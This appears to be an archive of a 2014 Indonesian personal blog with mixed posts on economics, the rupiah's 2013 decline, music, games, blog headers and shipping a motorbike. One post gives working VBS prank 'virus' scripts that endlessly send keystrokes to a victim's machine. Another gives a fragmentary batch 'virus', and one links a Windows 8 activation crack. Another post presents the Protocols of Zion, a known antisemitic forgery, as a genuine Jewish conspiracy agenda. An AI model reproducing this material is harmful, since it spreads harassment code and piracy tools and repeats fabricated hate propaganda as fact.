Wednesday, 10 September 2014

CAPITALISM:definition,history,benefit,weakness,and critic

Capitalism




CAPITALISM
(C1J013008)

Definition
What is capitalism system?
Class division
Capitalism is the social system which now exists in all countries of the world. Under this system, the means for producing and distributing goods (the land, factories, technology, transport system etc) are owned by a small minority of people. We refer to this group of people as the capitalist class. The majority of people must sell their ability to work in return for a wage or salary (who we refer to as the working class.

The working class are paid to produce goods and services which are then sold for a profit. The profit is gained by the capitalist class because they can make more money selling what we have produced than we cost to buy on the labour market. In this sense, the working class are exploited by the capitalist class. The capitalists live off the profits they obtain from exploiting the working class whilst reinvesting some of their profits for the further accumulation of wealth.
In capitalism, the motive for producing goods and services is to sell them for a profit, not to satisfy people's needs. The products of capitalist production have to find a buyer, of course, but this is only incidental to the main aim of making a profit, of ending up with more money than was originally invested. This is not a theory that we have thought up but a fact you can easily confirm for yourself by reading the financial press. Production is started not by what consumers are prepared to pay for to satisfy their needs but by what the capitalists calculate can be sold at a profit. Those goods may satisfy human needs but those needs will not be met if people do not have sufficient money.

Tuesday, 9 September 2014

Penjelasan dan bagan Ekonomi sumberdaya manusia(ESDM) untuk jurusan IESP


1.Perencanaan Sumber daya Manusia ( Human Resources Planning )
Perencanaan sumber daya manusia memfokuskan pada penyediaan angkatan kerja dengan pengetahuan dan ketrampilan tinggi serta penciptaan kesempatan kerja, kemudian membawa pada arah telaahan perencanaan sumber daya manusia yang meliputi analisis permintaan dan penawaran tenaga kerja yang akan terjadi pada masa yang akan datang.

Monday, 8 September 2014

How to make virus otomatic typing?,download virus otomatis ngetik




pertama ikuti langkah-langkah berikut ini:
karena script ini tidak bisa di copy dari blog ini maka anda bisa download di link saya :
downloadtextnotepadvirus
         
downloadvirusvbsprogram

1.buka notepad lalu ketik:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Kamu emang jelek banget sumpeh!"

loop

script ini membuat korban anda mengetik "Kamu emang jelek banget sumpeh!"

2.script ini membuat korban terus menerus menekan enter
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

3.dan korban juga akan terus-menerus menekan space
MsgBox "Balik lagi ah...saltik"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

selanjutnya anda tinggal menggabungkan semuanya
terimakasih sudah berkunjung

Friday, 5 September 2014

Manfaat mendengarkan instrumental music untuk kesehatan


akhir-akhir ini saya sering sekali mendengarkan instrumental music,saat belajar di malam hari,bahkan terkadang sampai saya tidur,manfaat mendengarkan instrumental dan music relax adalah:

1.Kemampuan otak meningkat, lewat penelitian dengan mendengarkan musik terbukti dapat meningkatkan fungsi otak, memperkuat daya ingat, meredakan stres, membantu mereka yang mengalami kondisi mental yang kurang stabil serta meningkatkan kecerdasan.

2.Terapi penyembuhan penyakit, dengan musik para pasien yang sedang menjalani terapi dapat terbantu karena musik ternyata dapat memberi dampak positif bagi pengobatan penyakit jangka panjang seperti kanker, stroke, jantung maupun gangguan pernafasan, menurut beberapa penelitian musik dapat membantu menurunkan tekanan darah, mengurangi rasa cemas, rasa sakit, detak jantung lebih stabil.

3.Membantu penderita imsomnia, bagi mereka yang sulit tidur atau penderita insomnia dianjurkan untuk mendengarkan musik yang lembut atau musik klasik selama 45 menit sebelum tidur, dengan musik ini otak menjadi rileks sehingga dapat tidur dengan pulas.

Rekomendasi lagu Instrumen Untuk tidur dan Relaxasi ,listening and free download



kenapa saya merekomendasikan instruemen ini?,karena saya selalu mendengarkannya setiap hari,yaitu ketika belajar dimalam hari,kadang sampai saya tertidur,saya pun menggunakan speaker dengan volume medium untuk mendengarkan instrumen-instrumen ini.coba dengarkan yang 1 ini:

sangat menyenangkan dan menenangkan,apalagi ketika bangun pagi ketika belajar di pagi hari,sekitar jam 4 pagi

berikut instrumen rekomendasi saya dan link downloadnya:

1.The power of love Instrumen: Download
2.OST endless love(ending)   : Download
3.Winter sonata(instrumen)   : Download
4.Sleeping Child instrumen   : Download
5.Mozart Panchebel           : Download(biola instrument)
                               Download(piano Instrumen)

nah ini saja rekomendasi dari saya,semoga bermanfaat untuk membantu tidur kalian bagi yang kesulitan tidur,dan juga membantu konsentrasi belajar

Rekomendasi lagu Instrumen ini memang saya yang memilihkannya,karena terbukti membuat saya relax,mendengarkan Mozart panchebel(OST my sassy girl lho) sangat membuat pikiran relax,rekomendasi saya lebih bagus Mozart panchebel insrumen yang Piano Instrumen dibandingkan Biola instrumen


Cara membuat Text Virus buat iseng ke teman

ok malam ini saya akan mengajarkan kepada kalian cara membuat virus sederhana,malam ini saya akan memberitahu cara membuat suatu jenis virus,ya cuma virus ringan saja,karena ditujukan untuk membuat panik mangsa kita hehe



1.buka notepad lalu ketikkan kata-kata berikut
ls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls

Saturday, 30 August 2014

Free download Activation software for Windows 8 ,link 4shared




silahkan download di link berikut: Windows8activation

Status FB florence sihombing sehingga ditangkap



jangan ikuti dia ya,ntar kalian diusir dari jogja,janga ditiru !!

Ini dia Tweet florence sihombing

gini nih gan statusnya,parah dah
kronologis ceritanya adalah dia mau beli bbm pertamax,eh tapi nggak mau ngantri,dan nyelak di jalur mobil,otomatis disorakin sama pembeli yang antri dan tidak dilayani oleh petugas

mungkin karena malu dan kesal dia marah-marahnya lewat twitter.
dasar

Friday, 29 August 2014

Battlefield Bad Company 2 :Last mission


akhirnya tamat juga setelah seharian main battlefield bda company 2,seru banget gan,jadi begini nih cerita endingnya:

operasi aurora adalah tempat awal game ini dimulai,yaitu mencari senjata scalar weapon yang dibuat jepang saat perang dunia ke 2,tapi ada 1 bagian dari senjata scalar weapon yang hilang,karena pasukan elit yang dikirim tewas.

lanjut ke zaman modern,dimana sedang terjadi perang dingin,mungkin udah panas kali,soalnya amerika dan rusia saling menyerang.

konon katanya senjata atau komponen rahasia scalar weapon ada didaerah rusia,dan ternyata komponen rahasia itu ada dibangkai kapal di daerah tandus bergurun yaitu laut aral,yang tadinya laut lalu menjadi kering karena 2 sungai pemasok air dilaut aral dibendung oleh unisoviet:

setelah komponen rahasia ditemukan dan diberikan ke bos ternyata bos berkhianat dan berpaling ke rusia,dan memberikan senjata scalar weapon ke ilmuan rusia yang ane lupa namanya,tapi akhirnya si bos pengkhianat itu malah dibunuh sama si ilmuan rusia

misi pun berlanjut untuk mengambil kembali senjata atau komponen rahasia scalar weapon itu,dan puncaknya adalah sebelum misi terakhir( airbone:misi terakhir),letaknya dibandara yang saat itu pasukan Rusia lagi di gempur habis-habisan sama US,terlihat pasukan rusia hanya melindungi pesawat Antonov yang ada di jalan landing,dan tiba-tiba saja pesawat bergoyang serta mengeluarkan gelombang kejut listrik yang mirip bom atom,mengerikan sekali.

Tim elit bad company yaitu marlow dan kawan-kawan segeran berlindung dan tiarap karena mereka teerlindungi oleh lapisan beton yang tebal

saat mereka bangun suasana menjadi sepi dan tiba-tiba saja dari atas langit jatuh helikopter Blackhawk Us seakan-akan tersedot oleh bumi,jadi inilah kekuatan scalar weapon.

kemudian tim bad company mengejar pesawat dan berhasil menyusup kedalamnya,ada penyergapan dengan pisau disini karena tim bad company tidak membawa senjata,setelah mengambil senjata musuh mereka menghancurkan pasukan rusia yang ada didalam pesawat,lalu setelah itu mereka menghancurkan tempat pelindung scalar weapon dengan bom C-4,ternyata disana ada si ilmuan rusia,dia kabur dan mencoba mengambil parasut teman kita saat melompat dari pesaswat yang mau jatuh,oh iya pesawatnya sudah berada di Texas lho karena si ilmuan rusia ingin menghancurkan pusat energi dan teknologi di texas sebelum invasi Rusia ke Amerika

akhirnya si ilmuan rusia mati ditembak oleh marlow ketika terjun diudara,dan kembalilah pasukan elit bad company ke Amerika,"home sweet home"kata si kapten.
tapi tiba-tiba ada 3 humvee datang dan turunlah seorang jenderal:"selamat atas keberhasilan kalian,dan kami rakyat US sangat berterimakasih kepada kalian",maaf tapi kalian harus ikut kami lagi",kata si jenderal

"tapi kenapa jendral?,kita sudah menghancurkan scalar weapon dan mencegah invasi?,invasion canceled"kata seorang bad company
"no,tidak,rusia memang tidak menginvasi amerika,tapi mereka datang dan menginvansi melintasi alaska menuju amerika,80% alaska sudah mereka kuasai".


THE END

FREE Make Header For Website Without Adobe CS


this is header i haved make it by my self,free,easy,and not need adobe aplication



follow this step:

1.first you have to go to this link FREEMAKEHEADER

2.chose an image that you like and then klik it

3.and the edit your header type



4. klik create logo
5.and the right klik on your mouse and klik "save image"

Thursday, 28 August 2014

Cara membuat header Online tanpa photoshop


cara membuat header online tanpa photoshop mudah sekali,tapi jenis header ini tanpa gambar,hanya berupa tulisan dan warna-warna saja,tanpa gambar

ikuti langkah saya berikut ini:

1.masuk ke link berikut ini FREEMAKEHEADER

2.pilih jenis huruf dan background warna yang anda sukai
3.klik lalu anda tinggal memilih dan meng edit header anda
width:adalah lebar header anada
height:tinggi header anda
agar bisa mengatur width dan height anda,maka uncentang kotaknya

4. klik create logo
5.kemudian klik kanan gambar header anda dan "save image"

Cara mengembalikan Header Blog yang terhapus

waktu itu admin juga nggak sengaja menghapus header admin,cara mengmbalikannya mudah sekali,pertama coba kalian lihat gambar ini:



nah kalo sama kayak gini agan tinggal klik "Tambah gadget"

Wednesday, 27 August 2014

Listening OST. Inuyasha "change The world" free download





I want to change the world
kaze wo kakenukete nanimo osorezu ni
ima yuuki to egao no KAKERA daite
Change my mind
jounetsu tayasazu ni takanaru mirai e
te wo nobaseba kagayakeru hazu sa
It's wonderland


[Instrumental]

hai-iro no sora no kanata nanika oite kita
kimi wa mayoi nagara
sagashi-tsudzukeru
kimi no kokoro furuete'ta asu no mienai yo
nanimo shinjirarezu mimi wo fusagu
kimi ni deaeta toki hontou no ibasho mitsuketa
nanigenai yasashisa ga koko ni atte
bokura mezameru

Ending Beelzebub The movie,apakah ada season 2?


sambil baca paling enak dengerin OST ending beelzebub 1 ini,yang dibawakan oleh AKB48 Ending cerita manga Beelzebub dan movienya berbeda,karena admim udah liat keduanya,sebenarnya cerita yang ada di movie dari 1-60 hampir sama dengan dikomik,walaupun tidak lengkap,hanya awalnya saja,dan movienya terkesan dibuat sangat buru-buru,coba aja agan tonton.

Ending di Movie:
singkat cerita,kita mulai ceritanya setelah Oga dan kawan-kawan(kunieda senpai,kanzaki,himekawa,dan Tojo) berhasil mengalahkan 6 kesatria suci ST.ishiyama di pertandingan voli,dan mereka tidak jadi dikeluarkan dari sekolah,setelah itu terlihat di akhir pertandingan kekuatan oga dan beel-chan semakin meningkat,dengan oga mengamuk dan mengeluarkan kekuatan iblisnya didepan umum,nah dari sinilah muncul tokoh2 baru yang makin menambah seru jalan cerita,seperti izuma-kun dan guru gila yaitu Saotome sensei,walaupun gila dia sangat kuat.

Friday, 23 May 2014

Agenda jahat protocol of Zion

1. Manusia itu lebih banyak cenderung pada kejahatan ketimbang kebaikan. Sebab itu, Konspirasi harus mewujudkan ‘hasrat alami’ manusia ini. Hal ini akan diterapkan pada sistem pemerintahan dan kekuasaan. Bukankah dulu manusia tunduk kepada penguasa tanpa pernah membangkang? Undang-undang hanyalah alat untuk membatasi rakyat, bukan untuk penguasa

2. Kebebasan politik utopis! Walau begitu, Konspirasi harus mempropagandakan ini ke tengah rakyat. Jika hal itu sudah dimakan rakyat, maka rakyat akan mudah membuang segala hak dan fasilitas yang telah didapat guna memperjuangkan idealisme yang utopis itu. Saat itulah, konspirasi bisa merebut hak dan fasilitas mereka

3. Kekuatan uang bisa mengalahkan segalanya. Agama yang bisa menguasai rakyat di masa dulu, kini mulai digulung dengan kampanye kebebasan. Namun rakyat banyak tidak tahu harus melakukan apa dengan kebebasan itu. Inilah tugas konspirasi untuk mengisinya demi kekuasaan;

4. Demi tujuan, segala cara boleh dilakukan. Siapa pun yang ingin berkuasa, dia mestilah meraihnya dengan licik, pemerasan, dan pembalikan opini. Keluhuran budi, etika, moral, dan sebagainya adalah keburukan dalam dunia politik;

5. Kebenaran adalah kekuatan konspirasi. Dengan kekuatan, segala yang diinginkan akan terlaksana;

6. Bagi kita yang hendak menaklukkan dunia secara finansial, kita harus tetap menjaga kerahasiaan. Suatu saat, kekuatan konspirasi akan mencapai tingkat di mana tidak ada kekuatan lain yang berani untuk menghalangi. Setiap kecerobohan dari dalam, akan merusak program besar yang telah ditulis berabad-abad oleh para pendeta Yahudi;

7. Simpati rakyat harus diambil agar mereka bisa dimanfaatkan untuk kepentingan konspirasi. Massa adalah buta dan mudah dipengaruhi. Penguasa tidak akan bisa menggiring rakyat kecuali ia berlaku sebagaidiktator. Inilah satu-satunya jalan;

8. Beberapa sarana untuk mencapai tujuan adalah: Miras & Narkoba, perusakan moral, seks, suap, dan sebagainya. Hal ini sangat penting untuk menghancurkan norma-norma kesusilaan masyarakat. Konspirasi harus merekrut dan mendidik tenaga-tenaga muda untuk dijadikan sarana pencapaian tujuan tersebut;

9. Konspirasi akan menyalakan api peperangan secara terselubung. Bermain di kedua belah pihak. Sehingga Konspirasi akan memperoleh manfaat besar tapi tetap aman dan efisien. Rakyat akan dilanda kecemasan yang mempermudah bagi konspirasi untuk menguasainya;

10. Konspirasi sengaja memproduksi slogan agar menjadi ‘tuhan’ bagi rakyat. Dengan slogan itu, pemerintahan aristokrasi keturunan yang tengah berkuasa di Perancis akan diruntuhkan. Setelah itu, Konspirasi akan membangun pemerintahan yang sesuai dengan Konspirasi;

11. Perang yang dikobarkan konspirasi secara diam-diam harus menyeret negara tetangga agar mereka terjebak utang. Konspirasi akan memetik keuntungan dari kondisi ini;

12. Pemerintahan bentukan Konspirasi harus diisi dengan orang-orang yang tunduk pada keinginan konspirasi. Tidak bisa lain;

13. Dengan emas, konspirasi akan menguasai opini dunia. Satu orang Yahudi yang menjadi korban sama dengan seribu orang non-Yahudi (Gentiles/Ghoyim) sebagai balasannya;

14. Setelah konspirasi berhasil merebut kekuasaan, pemerintahan baru yang dibentuk harus membasmi rezim lama yang dianggap bertanggungjawab atas terjadinya semua kekacauan. Hal tersebut akan menjadikan rakyat percaya kepada konspirasi bahwa pemerintahan yang baru adalah pelindung dan pahlawan dimata mereka;

15. Krisis ekonomi yang dibuat akan memberikan hak baru kepada konspirasi, yaitu hak pemilik modal dalam penentuan arah kekuasaan. Ini akan menjadi kekuasaan turunan;

16. Penyusupan ke dalam jantung Freemason Eropa agar bisa mengefektifkan dan mengefisienkannya. Pembentukan Bluemasonry akan bisa dijadikan alat bagi konspirasi untuk memuluskan tujuannya;

17. Konspirasi akan membakar semangat rakyat hingga ke tingkat histeria. Saat itu rakyat akan menghancurkan apa saja yang kita mau, termasuk hukum dan agama. Kita akan mudah menghapus nama Tuhan dan susila dari kehidupan;

18. Perang jalanan harus ditimbulkan untuk membuat massa panik. Konspirasi akan mengambil keuntungan dari situasi itu;

19. Konspirasi akan menciptakan diplomat-diplomatnya untuk berfungsi setelah perang usai. Mereka akan menjadi penasehat politik, ekonomi, dan keuangan bagi rezim baru dan juga di tingkat internasional. Dengan demikian, konspirasi bisa semakin menancapkan kukunya dari balik layar;

20. Monopoli kegiatan perekonomian raksasa dengan dukungan modal yang dimiliki konspirasi adalah syarat utama menundukkan dunia, hingga tidak ada satu kekutan non-Yahudi pun yang bisa menandinginya. Dengan demikian, kita bisa bebas memainkan krisis suatu negeri;

21. Penguasaan kekayaan alam negeri-negeri non-Yahudi mutlak dilakukan;

22. Meletuskan perang dan memberinya—menjual— senjata yang paling mematikan akan mempercepat penguasaan suatu negeri, yang tinggal dihuni oleh fakir miskin;

23. Satu rezim terselubung akan muncul setelah konspirasi berhasil melaksanakan programnya;

24. Pemuda harus dikuasai dan menjadikan mereka sebagai budak-budak konspirasi dengan jalan penyebarluasan dekadensi moral dan paham yang menyesatkan;

25. Konspirasi akan menyalahgunakan undang-undang yang ada pada suatu negara hingga negara tersebut hancur karenanya.

Sunday, 16 March 2014

Cara megirim paket motor dengan jasa herona,info terupdate 2014




jadi gini nih gan ceritanya:
cara ngirim motor pake herona mudah aja kok,yang penting :
1.ada motornya
2.ada STNK asli dan KTP

biaya?.
1.kalo motor matic dan bebek kena 300 rb
2.kalo motor sporty atau moge(motor gede kayak v-ixion,pulsar,tiger.ninja,dll) kena biaya 400-450 rb

jadi waktu itu admin mau ngirim motor admin (pulsar 200cc) ke purwekerto,sedangkan rumah admin di Tangerang selatan,setelah cari2 info dari teman dan internet akhirnya admin pilih Herona aja,soalnya kata teman admin pengirimannya dengan kereta dan cepat,ngirim hari ini 1 hari kemudian/lusa insaalloh sampai.

dari rumah admin bawa motornya ke stasiun jakarta kota,karena paling dekat dari rumah admin,dan parkirannya juga luas,setelah motor sampe diparkiran stasiun admin keliling cari-cari kantor herona,taunya ada didepan parkiran,waktu itu admin ngirimin jam 1 siang hari jum'at pas abis solat jum'at.

kalo ngirim motor di herona nggak pake lama ngurusnya,bilang ke petugasnya mau ngirim motor,terus motor kita diangkut ke gudang dan dipack,selanjutnya kita tinggal isi formulir khusus,lalu setelah itu kita serahkan ke teller.

buat ngirim motornya sih admin cuma butuh waktu 30 menit doang,setelah bayar dan dikasih buktinya(PS:jangan sampe ilang) tinggal pulang deh,oh iya dan teller herona di stasiun Kota juga cakep banget sumpah,klo nggak percaya dateng aja sendiri.

semoga info ini bermanfaat...

Friday, 21 February 2014

apa itu CAD(current account deficit)?


CAD atau current account deficit adalah defisit transaksi berjalan pada neraca perdagangan,yang artinya ekspor lebih kecil daripada import atau impor lebih besar daripada export

dengan defisit neraca perdagangan berarti pendapatan yang kita dapat adalah minus karena antara pendapatan(export) dan pengeluaran(import) lebih besar pengeluaran,sehingga kita harus menggunakan uang kita untuk menutup kekurangan

dan defisit transaksi berjalanlah yang menyebabkan devisa suatu negara berkurang,rata-rata devisa suatu negara dalam bentuk mata uang dollar selain emas,devisa digunakan untuk import barang,hibah,dan pembelian senjata dari luar negri.

Thursday, 20 February 2014

mengapa rupiah anjlok pada tahun 2013?

MENGAPA RUPIAH ANJLOK PADA TAHUN 2013?


Pada tahun 2013 kurs Rupiah  terhadap Dollar tercatat pada posisi diatas Rp.12.000 Rupiah padahal Indonesia mangawali tahun 2013 dengan posisi nilai tukar Rp.9600/$1,ini adalah posisi pelemahan Rupiah tertinggi yang sebelumnya pernah terjadi pada krisis moneter 1997-1998.

Pelemahan nilai tukar rupiah juga tidak lepas dari defisit transaksi berjalan (current account defisit) yang ditandai dengan lebih besarnya impor daripada ekspor

Defisit transaksi berjalan menyebabkan pemerintah membutuhkan dollar dalam jumlah banyak untuk membayar defisit,ditambah lagi untuk membayar utang luar negeri yang sebagian besar dimiliki oleh perusahaan swasta di Indonesia,akibat terlalu banyaknya permintaan dollar maka harga dollar pun naik dan rupiah turun,sedangkan konsumsi nasional yang mendorong defisit adalah konsumsi BBM yang tinggi,anggarannya mencapai Rp.210 triliun untuk sibsidi BBM,untuk memasok kebutuhan BBM nasional pemerintah mengimpor BBM karena produksi dalam negeri tidak mencukupi.


Ekspor
Impor
Neraca
Bulan
Migas
Nonmigas
Total
Migas
Nonmigas
Total
Migas
Nonmigas
Total
Januari
2,66
12,72
15,38
3,97
11,48
15,45
-1,31
1,24
-0,07
Februari
2,57
12,45
15,02
3,64
11,67
15,31
-1,07
0,78
-0,29
Maret
2,93
12,09
15,02
3,90
10,99
14,89
-0,97
1,10
-0,13
April
2,45
12,31
14,76
3,63
12,83
16,46
-1,18
-0,52
-1,70
Mei
2,92
13,21
16,13
3,44
13,22
16,66
-0,52
-0,01
-0,53
Juni
2,80
11,96
14,76
3,53
12,11
15,64
-0,73
-0,15
-0,88
Juli
2,28
12,83
15,11
4,14
13,28
17,42
-1,86
-0,45
-2,31
Jan-Juli
18,61
87,57
106,18
26,25
85,58
111,83
-7,64
1,99
-5,65

Walaupun indonesia pada awal tahun 2013 defisit transaksi berjalan akan tetapi pada tiga bulan berturut-turut,oktober-desember,ekspor mendapat surplus sebesar USD 2,3 miliyar

Sebagian besar permintaan dollar dari dalam negeri dilakukan oleh para pengusaha swasta dan swasta nasional untuk kebutuhan impor barang dan utang luar negeri,sedangkan pemerintah menggunakan dollar untuk impor kebutuhan nasional seperti BBM,beras,kedelai dan lain-lain,untuk memenuhi supplai dollar didalam negeri pemerintah memperoleh dollar dari ekspor,hibah,dan penanaman modal asing(PMA),tetapi penanaman modal asing juga sangat beresiko karena jika terjadi gejolak moneter atau politik didalam suatu negara mereka dapat menarik modalnya kembali dan menyebabkan mata uang lokal jatuh

Ada 2 hal yang menyebabkan  mengapa nilai tukar rupiah melemah pada 2013,pertama adalah karena banyaknya permintaan dollar dari pasar,dan yang kedua adalah karena penarikan modal Investor asing dari dalam negeri,keluarnya sejumlah besar Investor Asing dari Indonesia berarti mereka menukarkan uangnya dengan mata uang negara lain sehingga penawaran Rupiah meningkat dan membuat Harga Rupiah anjlok

Pelarian modal Investor asing disebabkan kebijakan The Fed(Bank sentral Amerika) untuk mengurangi QE(quantitative easing),sedangkan QE sendiri adalah stimulus yang diberikan The Fed dengan cara membeli saham & obligasi di Amerika,secara tidak langsung The Fed mengucurkan dana untuk membuat perusahaan di Amerika tetap hidup karena sedang krisis,tiap bulan The Fed mengeluarkan $85 miliar untuk beli saham,tapi tahun ini The Fed berencana menurunkan stimulus pembelian saham menjadi $75 miliar/bulan,berarti pasar Amerika sudah kembali sehat atau dalam tahap kembali tumbuh,sehingga dana asing yang terparkir di negara-negara berkembang terutama Indonesia akan kembali lagi ke Amerika
Para Investor asing melakukan spekulasi apakah mereka harus menarik modal mereka,akhirnya pada juli 2013 pasar modal indonesia IHSG(indeks harga saham gabungan) tumbang sangat dalam hingga 20%,ini menunjukan bahwa para investor asing menarik modal mereka dari Indonesia dan menukarkan uang mereka menjadi dollar sehingga Rupiah anjlok

Jadi kita simpulkan bahwa penyebab jatuhnya harga rupiah pada 2013 ada 2 hal,yaitu:1).defisit neraca perdagangan,atau impor lebih besar daripada ekspor,2).penarikan modal investor asing karena kebijakan tapering atau pengurangan stimulus The Fed dari $85 miliar menjadi $75 miliar dan akan terus berlanjut sehingga pasar Amerika tidak bergantung lagi dari suntikan modal The Fed

Untuk menghadapi defisit neraca perdagangan dan penarikan modal asing pemerintah sudah menyaipkan rencana tertentu,diantaranya adalah mengurangi impor yang tidak dibutuhkan misalnya saat ini pemerintah sudah menghentikan impor beras,dan melakukan program konversi BBM ke BBG yang lebih murah dan hemat,kebijakan-kebijakan itu adalah usaha pemerintah untuk mengurangi ketergantungan pasar dari BBM,dan jika program itu terealisasikan maka kita tidak perlu impor BBM yang menghabiskan anggaran lagi.

Dan untuk menghadapi ketidakpastian modal Investor asing karena sewaktu-waktu mereka bisa menarik modalnya tiba-tiba karena kebijakan tapering The Fed,pemerintah kita sudah menyiapkan jurus jitunya
Salah satu antisipasi yang dipersiapkan pemerintah dalam menyambut pengurangan stimulus yang lebih besar dari The Fed adalah:mengeluarkan bonds stabilization framework(BSF),kebijakan yang memungkinkan pemerintah untuk buyback atau pembelian kembali surat utang negara dan BUMN

Selain itu pemerintah Indonesia juga melakukan bilateral swap arrangement  dengan Bank of japan sebesar $22,78 miliar dollar,apakah bilateral swap arrangement itu?,BSA adalah perjanjian antara 2 negara untuk saling membeli mata uang mereka untuk menjaga kestabilan ekonomi sebagai second line of defence,misalkan investor di suatu negara menarik modal mereka otomatis mata uang lokal akan jatuh,karena mereka menukarkan mata uang loka denga dollar(sebagai contoh),jika negara tersebut sudah melakukan swap dengan negara lain maka negara partnernya harus membeli mata uang lokal yang sudah jatuh dengan dollar sesuai dengan perjannjian,misalnya 5 miliar dollar,akan tetapi juga ada jenis swap yang hanya digunakan untuk perdagangan tanpa harus menukarkannya ke dollar,indonesia sudah menandatangani currency swap dengan china sebesar 100 miliyar RMB atau setara dengan 14.5 miliyar dollar atau setara dengan 175 Triliyun Rupiah,dana ini digunakan hanya untuk kebutuhan importir Indonesia untuk mengimpor barang dari china dan juga sebaliknya importir china mengimpor baranga dari Indonesia sehingga tidak perlu menukarkan uangnya ke dollar dan cadangan devisa terjaga.

"jayalah terus indonesia"